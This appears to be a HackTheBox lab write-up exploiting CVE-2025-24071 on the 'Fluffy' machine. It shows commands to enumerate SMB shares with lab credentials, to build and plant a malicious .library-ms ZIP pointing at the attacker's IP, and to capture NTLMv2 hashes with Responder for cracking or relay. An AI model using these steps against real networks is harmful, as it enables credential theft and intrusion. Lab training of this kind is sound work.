CVE-2025-24071

Proof of Concept for CVE-2025-24071: Windows File Explorer Spoofing Vulnerability

Vulnerability

CVE-2025-24071

Type

Windows File Explorer Spoofing via .library-ms files

CVSS Score

7.8 (High)

Description

CVE-2025-24071 is a spoofing vulnerability in Windows File Explorer that leverages the .library-ms file format. An attacker can craft this file to trick the user into connecting to a remote SMB server, potentially leaking NTLMv2 credentials.

Environment Setup

• Attacker (You): Kali Linux on VPN, IP: 10.10.14.228

• Victim: HTB Machine "Fluffy"

• Domain: fluffy.htb

• Valid credentials: Username: j.fleischman, Password: J0elTHEM4n1990!

• Writable SMB share discovered: IT

Step 1: Enumerate SMB Shares

First, let's see what shared folders are available on the target and if we can write to any.

nxc smb 10.129.60.202 -u j.fleischman -p J0elTHEM4n1990! --shares

Expected output:

SMB         10.129.60.202   445    DC01             Share           Permissions     Remark
SMB         10.129.60.202   445    DC01             -----           -----------     ------
SMB         10.129.60.202   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.60.202   445    DC01             C$                              Default share
SMB         10.129.60.202   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.60.202   445    DC01             IT              READ,WRITE      
SMB         10.129.60.202   445    DC01             NETLOGON        READ            Logon server share
SMB         10.129.60.202   445    DC01             SYSVOL          READ            Logon server share

The IT share is what we’re interested in because it has both READ and WRITE permissions.

Step 2: Build the Exploit File

Now we’ll use the public exploit script to generate a malicious .library-ms file wrapped in a ZIP.

python3 exploit.py -i 10.10.14.228 -f Reports

This command tells the script:

• -i: Your local IP address (Kali machine) or VPN (tun0)

• -f: The name of the file we want to generate (e.g., Reports.library-ms)

After it runs, you’ll see a ZIP file called exploit.zip this is what we’ll upload to the target.

Step 3: Upload the Exploit

We now push our exploit.zip file to the writable SMB share (IT) like this:

smbclient //10.129.60.202/IT -U j.fleischman%J0elTHEM4n1990!

Then, within the smbclient prompt:

put exploit.zip

The share should now look like this:

smb: \> ls
  .                                   D        0  Tue May 27 06:11:42 2025
  ..                                  D        0  Tue May 27 06:11:42 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 15:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 15:04:05 2025
  exploit.zip                         A      322  Tue May 27 06:11:42 2025
  KeePass-2.58                        D        0  Fri Apr 18 15:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 15:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 14:31:07 2025

Step 4: Set Up Responder to Capture Hashes

Now, start Responder on your VPN interface to catch any incoming SMB authentication attempts:

sudo responder -I tun0 -v

Make sure the Responder window stays open it will capture NTLMv2 hashes automatically when the file is opened by the victim.

Step 5: Wait for the Victim to Open the File

Once someone opens exploit.zip and interacts with Reports.library-ms, their system will silently try to connect to your Kali box. Responder will then capture their NTLMv2 hash.

You’ll see output like:

[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:<challenge>:<NTLMv2 hash>:...  

What Can You Do With This Hash

• You can crack it using hashcat or john to retrieve the plaintext password

• Or, relay it in real-time to escalate privileges in certain scenarios (e.g., with ntlmrelayx)

Resources

• GitHub Exploit

• MITRE CVE Details

• HTB Machine